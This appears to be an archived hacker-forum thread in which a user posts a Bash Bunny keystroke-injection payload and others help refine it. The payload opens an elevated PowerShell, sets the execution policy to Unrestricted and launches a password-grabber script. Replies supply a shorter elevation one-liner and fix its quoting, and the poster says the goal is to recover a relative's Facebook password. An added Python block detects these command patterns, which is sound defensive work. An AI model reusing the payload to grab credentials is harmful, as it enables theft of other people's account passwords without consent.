Powershell ExecutionPolicy bypass


Trhd.life

Hello, this is my first submitted payload and I was wondering if I can have any help maturing this script, if there was any way to polish it up.

The point of the script is to open an admin PowerShell and then unrestrict the execution policy.

It came about due to the password grabber not giving me the results I needed.

I start off with a Ducky Script to set the execution policy, then go on to basically load the password grabber .ps1.

Any way to make this script better?

Ducky Script

DELAY 3000
GUI d
DELAY 700
GUI r
DELAY 700
STRING PowerShell
DELAY 700
ENTER
DELAY 700
STRING Start-Process powershell -verb runAs
DELAY 700
ENTER
DELAY 700
ALT y
DELAY 700
STRING Set-ExecutionPolicy UnRestricted
DELAY 700
ENTER
STRING exit
DELAY 500
ENTER
DELAY 500
STRING exit
ENTER

Payload

LED SETUP
ATTACKMODE HID STORAGE

# Check for switch position to make it easier for us.
GET SWITCH_POSITION

LED ATTACK

if [ -f "/root/udisk/payloads/${SWITCH_POSITION}/ducky_script.txt" ];
then
    QUACK ${SWITCH_POSITION}/ducky_script.txt
    LED FINISH
    sleep 5
    LED ATTACK
    RUN WIN "powerShell .((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\payload.ps1')"
    # Wait until passwords are grabbed.
    sleep 10
    LED FINISH
else
    LED FAIL
    echo "Unable to load ducky_script.txt" >> /root/debuglog.txt
    exit 1
fi

Hmm, when you use the -C or the -E parameter (those are short for -Command and -EncodedCommand) it is a bypass, as long as any additions are sucked in as a string to be invoked. But since you want a disabler, you can combine the PowerShell part into one run command.

GUI r
DELAY 700
STRING "powershell -C \"start-process powershell -verb runas -argumentlist '-C set-executionpolicy unrestricted'\""
DELAY 700
ENTER
DELAY 2000
ALT y

Of course, even with the policy restricted, you will see the PowerShell command will run the -C argument in both instances when it is called.

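From the defender's side, the one-liners traded in this thread are exactly what a process-creation detection rule would key on. The following Python is an added example (not code from this thread, from Hak5 or from the Bash Bunny project) that classifies command lines against the patterns discussed here; the sample log lines are constructed.

```python
"""Flag process command lines that show the ExecutionPolicy bypass patterns
discussed in this thread: Set-ExecutionPolicy Unrestricted, inline -Command /
-EncodedCommand launches, and a nested elevated PowerShell via Start-Process.
Added example for this page; all sample log lines below are constructed."""
import re

# (rule name, regex). PowerShell is case-insensitive, so re.I throughout.
PATTERNS = [
    ("set_executionpolicy_loosened",
     re.compile(r"set-executionpolicy\s+(unrestricted|bypass)", re.I)),
    ("inline_command_flag",
     re.compile(r"powershell(\.exe)?.*\s-(c|command)\b", re.I)),
    ("encoded_command_flag",
     re.compile(r"powershell(\.exe)?.*\s-(e|ec|enc|encodedcommand)\b", re.I)),
    ("nested_elevated_powershell",
     re.compile(r"start-process\s+powershell.*-verb\s+runas", re.I)),
]


def classify(cmdline: str) -> list:
    """Return the names of every rule that matches one command line."""
    return [name for name, rx in PATTERNS if rx.search(cmdline)]


def scan(lines):
    """Return (line, hits) pairs for each log line matching at least one rule."""
    results = []
    for line in lines:
        hits = classify(line)
        if hits:
            results.append((line, hits))
    return results


# Constructed command lines such as a Sysmon event 1 or 4688 record would carry.
SAMPLE_LOG = [
    "powershell",                                   # plain launch: no hit
    "Start-Process powershell -verb runAs",         # from the OP's Ducky Script
    "Set-ExecutionPolicy UnRestricted",             # from the OP's Ducky Script
    'powershell -C "start-process powershell -verb runas -argumentlist '
    "'-C set-executionpolicy unrestricted'\"",      # the one-liner suggested above
    "powershell -ExecutionPolicy RemoteSigned -File C:\\scripts\\backup.ps1",
]

if __name__ == "__main__":
    for line, hits in scan(SAMPLE_LOG):
        print(f"{', '.join(hits):<60} {line}")
```

Execution policy is a safety feature rather than a security boundary, so these flags are worth surfacing for visibility, not relied on for prevention.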

Update:

My original script does execute the payload but does not save anything in the loot file.

I have tried the suggested edit in PowerShell (not being executed by the Bash Bunny) with the following results:

PS C:\Users\PC> "powershell -C \"start-process powershell -verb runas -argumentlist '-C set-executionpolicy unrestricted'""
At line:1 char:18
+ "powershell -C \"start-process powershell -verb runas -argumentlist ' ...
+                  ~~~~~~~~~~~~~
Unexpected token 'start-process' in expression or statement.
    + CategoryInfo          : ParserError: (:) [], ParentContainsErrorRecordException
    + FullyQualifiedErrorId : UnexpectedToken

Also, to be clear, this task is to recover my mother-in-law's FB password to set up her new phone.

It does not have to be covert; I am simply using this opportunity to learn more about PowerShell.

That is because those \" are escaping the double quotes on the Bash Bunny, so if you are doing it without the Bunny it will look like this in the Run command prompt:

powershell -C "start-process powershell -verb runas -argumentlist '-C set-executionpolicy unrestricted'"

If you do it from the Bunny it will look like my previous post.

This topic is now archived and is closed to further replies.